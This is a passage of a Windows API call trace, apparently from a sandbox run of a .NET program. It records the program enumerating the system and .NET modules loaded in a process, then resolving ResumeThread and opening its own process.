(pv=0x8b4098) [0166.608] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e30000, lpmodinfo=0x235a9b4, cb=0xc | out: lpmodinfo=0x235a9b4*(lpBaseOfDll=0x73e30000, SizeOfImage=0xa000, EntryPoint=0x73e32a00)) returned 1 [0166.608] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.608] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e30000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0166.612] CoTaskMemFree (pv=0x8b4098) [0166.613] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.613] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e30000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0166.613] CoTaskMemFree (pv=0x8b4098) [0166.613] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77040000, lpmodinfo=0x235cac8, cb=0xc | out: lpmodinfo=0x235cac8*(lpBaseOfDll=0x77040000, SizeOfImage=0x58000, EntryPoint=0x770825c0)) returned 1 [0166.614] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.614] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77040000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0166.614] CoTaskMemFree (pv=0x8b4098) [0166.614] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.615] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77040000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0166.615] CoTaskMemFree (pv=0x8b4098) [0166.615] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c8d0000, lpmodinfo=0x235ebfc, cb=0xc | out: lpmodinfo=0x235ebfc*(lpBaseOfDll=0x6c8d0000, SizeOfImage=0x79000, EntryPoint=0x6c8df82a)) returned 1 [0166.616] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.616] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0166.616] CoTaskMemFree (pv=0x8b4098) [0166.616] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.616] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0166.617] CoTaskMemFree (pv=0x8b4098) [0166.617] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a00000, lpmodinfo=0x2360d44, cb=0xc | out: lpmodinfo=0x2360d44*(lpBaseOfDll=0x74a00000, SizeOfImage=0x45000, EntryPoint=0x74a1de90)) returned 1 [0166.617] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.617] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0166.618] CoTaskMemFree (pv=0x8b4098) [0166.619] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.619] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0166.619] CoTaskMemFree (pv=0x8b4098) [0166.619] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74400000, lpmodinfo=0x2362e50, cb=0xc | out: lpmodinfo=0x2362e50*(lpBaseOfDll=0x74400000, SizeOfImage=0x1bd000, EntryPoint=0x744e2a10)) returned 1 [0166.620] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.620] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0166.621] CoTaskMemFree (pv=0x8b4098) [0166.621] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.621] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0166.621] CoTaskMemFree (pv=0x8b4098) [0166.621] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a50000, lpmodinfo=0x2364f5c, cb=0xc | out: lpmodinfo=0x2364f5c*(lpBaseOfDll=0x74a50000, SizeOfImage=0x14f000, EntryPoint=0x74b06820)) returned 1 [0166.623] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.623] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a50000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0166.623] CoTaskMemFree (pv=0x8b4098) [0166.623] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.623] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a50000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0166.624] CoTaskMemFree (pv=0x8b4098) [0166.624] GetModuleInformation (in: hProcess=0x2e4, hModule=0x755c0000, lpmodinfo=0x23670ec, cb=0xc | out: lpmodinfo=0x23670ec*(lpBaseOfDll=0x755c0000, SizeOfImage=0x147000, EntryPoint=0x755d1cf0)) returned 1 [0166.625] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.625] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x755c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0166.626] CoTaskMemFree (pv=0x8b4098) [0166.626] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.626] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x755c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0166.626] CoTaskMemFree (pv=0x8b4098) [0166.627] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74990000, lpmodinfo=0x23691f8, cb=0xc | out: lpmodinfo=0x23691f8*(lpBaseOfDll=0x74990000, SizeOfImage=0x2b000, EntryPoint=0x74995680)) returned 1 [0166.627] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.627] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74990000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0166.628] CoTaskMemFree (pv=0x8b4098) [0166.628] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.628] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74990000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0166.629] CoTaskMemFree (pv=0x8b4098) [0166.629] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77030000, lpmodinfo=0x236b2fc, cb=0xc | out: lpmodinfo=0x236b2fc*(lpBaseOfDll=0x77030000, SizeOfImage=0xc000, EntryPoint=0x77033930)) returned 1 [0166.629] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.629] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77030000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0166.630] CoTaskMemFree (pv=0x8b4098) [0166.630] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.630] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77030000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0166.631] CoTaskMemFree (pv=0x8b4098) [0166.631] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d310000, lpmodinfo=0x236d428, cb=0xc | out: lpmodinfo=0x236d428*(lpBaseOfDll=0x6d310000, SizeOfImage=0x8000, EntryPoint=0x6d3117b0)) returned 1 [0166.631] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.632] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d310000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0166.633] CoTaskMemFree (pv=0x8b4098) [0166.633] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.633] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d310000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0166.633] CoTaskMemFree (pv=0x8b4098) [0166.633] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6b6f0000, lpmodinfo=0x236f534, cb=0xc | out: lpmodinfo=0x236f534*(lpBaseOfDll=0x6b6f0000, SizeOfImage=0x6b1000, EntryPoint=0x6b705d20)) returned 1 [0166.635] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.635] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0166.636] CoTaskMemFree (pv=0x8b4098) [0166.636] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.636] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0166.637] CoTaskMemFree (pv=0x8b4098) [0166.637] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c650000, lpmodinfo=0x2371664, cb=0xc | out: lpmodinfo=0x2371664*(lpBaseOfDll=0x6c650000, SizeOfImage=0xf5000, EntryPoint=0x6c6a4160)) returned 1 [0166.637] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.637] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c650000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0166.639] CoTaskMemFree (pv=0x8b4098) [0166.639] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.639] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c650000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0166.640] CoTaskMemFree (pv=0x8b4098) [0166.640] GetModuleInformation (in: hProcess=0x2e4, hModule=0x69850000, lpmodinfo=0x2373798, cb=0xc | out: lpmodinfo=0x2373798*(lpBaseOfDll=0x69850000, SizeOfImage=0x1228000, EntryPoint=0x0)) returned 1 [0166.641] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.641] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x69850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0166.642] CoTaskMemFree (pv=0x8b4098) [0166.642] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.642] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x69850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll")) returned 0x68 [0166.644] CoTaskMemFree (pv=0x8b4098) [0166.644] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75360000, lpmodinfo=0x2375940, cb=0xc | out: lpmodinfo=0x2375940*(lpBaseOfDll=0x75360000, SizeOfImage=0xeb000, EntryPoint=0x7539d650)) returned 1 [0166.645] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.645] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75360000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0166.646] CoTaskMemFree (pv=0x8b4098) [0166.646] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.646] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75360000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0166.646] CoTaskMemFree (pv=0x8b4098) [0166.647] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6fef0000, lpmodinfo=0x2377a44, cb=0xc | out: lpmodinfo=0x2377a44*(lpBaseOfDll=0x6fef0000, SizeOfImage=0x75000, EntryPoint=0x6ff29a60)) returned 1 [0166.647] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.647] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6fef0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0166.648] CoTaskMemFree (pv=0x8b4098) [0166.648] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.648] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6fef0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0166.649] CoTaskMemFree (pv=0x8b4098) [0166.649] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f820000, lpmodinfo=0x2379b50, cb=0xc | out: lpmodinfo=0x2379b50*(lpBaseOfDll=0x6f820000, SizeOfImage=0x13000, EntryPoint=0x6f829950)) returned 1 [0166.652] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.652] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f820000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0166.653] CoTaskMemFree (pv=0x8b4098) [0166.653] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.653] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f820000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTSP.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")) returned 0x1f [0166.654] CoTaskMemFree (pv=0x8b4098) [0166.654] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f7f0000, lpmodinfo=0x237bc5c, cb=0xc | out: lpmodinfo=0x237bc5c*(lpBaseOfDll=0x6f7f0000, SizeOfImage=0x2f000, EntryPoint=0x6f8095e0)) returned 1 [0166.655] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.655] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0166.656] CoTaskMemFree (pv=0x8b4098) [0166.656] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.656] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")) returned 0x1e [0166.657] CoTaskMemFree (pv=0x8b4098) [0166.657] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73ae0000, lpmodinfo=0x237dd68, cb=0xc | out: lpmodinfo=0x237dd68*(lpBaseOfDll=0x73ae0000, SizeOfImage=0x1b000, EntryPoint=0x73ae9050)) returned 1 [0166.658] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.658] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73ae0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0166.659] CoTaskMemFree (pv=0x8b4098) [0166.659] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.659] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73ae0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0166.660] CoTaskMemFree (pv=0x8b4098) [0166.660] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c850000, lpmodinfo=0x237fe74, cb=0xc | out: lpmodinfo=0x237fe74*(lpBaseOfDll=0x6c850000, SizeOfImage=0x7e000, EntryPoint=0x6c851140)) returned 1 [0166.661] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.661] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0166.662] CoTaskMemFree (pv=0x8b4098) [0166.662] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.662] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0166.663] CoTaskMemFree (pv=0x8b4098) [0166.663] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75b00000, lpmodinfo=0x2381fb4, cb=0xc | out: lpmodinfo=0x2381fb4*(lpBaseOfDll=0x75b00000, SizeOfImage=0x92000, EntryPoint=0x75b38cf0)) returned 1 [0166.665] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.665] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75b00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0166.666] CoTaskMemFree (pv=0x8b4098) [0166.666] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.666] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75b00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0166.667] CoTaskMemFree (pv=0x8b4098) [0166.667] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6ad40000, lpmodinfo=0x23840c8, cb=0xc | out: lpmodinfo=0x23840c8*(lpBaseOfDll=0x6ad40000, SizeOfImage=0x9ac000, EntryPoint=0x0)) returned 1 [0166.668] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.668] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6ad40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0166.669] CoTaskMemFree (pv=0x8b4098) [0166.669] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.669] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6ad40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll")) returned 0x64 [0166.670] CoTaskMemFree (pv=0x8b4098) [0166.670] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c4c0000, lpmodinfo=0x2386264, cb=0xc | out: lpmodinfo=0x2386264*(lpBaseOfDll=0x6c4c0000, SizeOfImage=0x18d000, EntryPoint=0x0)) returned 1 [0166.671] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.671] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0166.672] CoTaskMemFree (pv=0x8b4098) [0166.672] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.672] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll")) returned 0x74 [0166.673] CoTaskMemFree (pv=0x8b4098) [0166.673] GetModuleInformation (in: hProcess=0x2e4, hModule=0x68bf0000, lpmodinfo=0x238853c, cb=0xc | out: lpmodinfo=0x238853c*(lpBaseOfDll=0x68bf0000, SizeOfImage=0xc59000, EntryPoint=0x0)) returned 1 [0166.674] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.675] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x68bf0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0166.676] CoTaskMemFree (pv=0x8b4098) [0166.676] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.676] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x68bf0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll")) returned 0x80 [0166.677] CoTaskMemFree (pv=0x8b4098) [0166.677] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c7b0000, lpmodinfo=0x238a72c, cb=0xc | out: lpmodinfo=0x238a72c*(lpBaseOfDll=0x6c7b0000, SizeOfImage=0x92000, EntryPoint=0x6c7bdd60)) returned 1 [0166.678] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.678] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0166.679] CoTaskMemFree (pv=0x8b4098) [0166.679] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.679] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0166.680] CoTaskMemFree (pv=0x8b4098) [0166.681] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f730000, lpmodinfo=0x238c8f0, cb=0xc | out: lpmodinfo=0x238c8f0*(lpBaseOfDll=0x6f730000, SizeOfImage=0x1d000, EntryPoint=0x6f733b10)) returned 1 [0166.682] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.682] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f730000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0166.683] CoTaskMemFree (pv=0x8b4098) [0166.684] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.684] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f730000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0166.685] CoTaskMemFree (pv=0x8b4098) [0166.685] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c3f0000, lpmodinfo=0x238e9fc, cb=0xc | out: lpmodinfo=0x238e9fc*(lpBaseOfDll=0x6c3f0000, SizeOfImage=0xc5000, EntryPoint=0x0)) returned 1 [0166.686] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.686] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Runtime.Remoting.ni.dll") returned 0x1e [0166.689] CoTaskMemFree (pv=0x8b4098) [0166.689] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.689] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\System.Runtime.Remoting.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\system.runtime.remoting.ni.dll")) returned 0x83 [0166.690] CoTaskMemFree (pv=0x8b4098) [0166.690] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d300000, lpmodinfo=0x2390bf8, cb=0xc | out: lpmodinfo=0x2390bf8*(lpBaseOfDll=0x6d300000, SizeOfImage=0xd000, EntryPoint=0x6d3063e0)) returned 1 [0166.691] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.691] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d300000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0166.693] CoTaskMemFree (pv=0x8b4098) [0166.695] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.695] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d300000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0166.696] CoTaskMemFree (pv=0x8b4098) [0166.696] GetModuleInformation (in: hProcess=0x2e4, hModule=0x684d0000, lpmodinfo=0x2392cfc, cb=0xc | out: lpmodinfo=0x2392cfc*(lpBaseOfDll=0x684d0000, SizeOfImage=0x712000, EntryPoint=0x0)) returned 1 [0166.697] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.697] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x684d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0166.699] CoTaskMemFree (pv=0x8b4098) [0166.699] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.699] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x684d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll")) returned 0x6e [0166.700] CoTaskMemFree (pv=0x8b4098) [0166.700] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74920000, lpmodinfo=0x2394eb8, cb=0xc | out: lpmodinfo=0x2394eb8*(lpBaseOfDll=0x74920000, SizeOfImage=0x6000, EntryPoint=0x74921460)) returned 1 [0166.701] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.701] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74920000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0166.702] CoTaskMemFree (pv=0x8b4098) [0166.703] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.703] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74920000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0166.704] CoTaskMemFree (pv=0x8b4098) [0166.704] CloseHandle (hObject=0x2e4) returned 1 [0166.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResumeThread", cchWideChar=12, lpMultiByteStr=0x19cb74, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResumeThreadMÚd", lpUsedDefaultChar=0x0) returned 12 [0166.705] GetProcAddress (hModule=0x74610000, lpProcName="ResumeThread") returned 0x7462a800 [0166.718] GetCurrentProcessId () returned 0x1318 [0166.718] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1318) returned 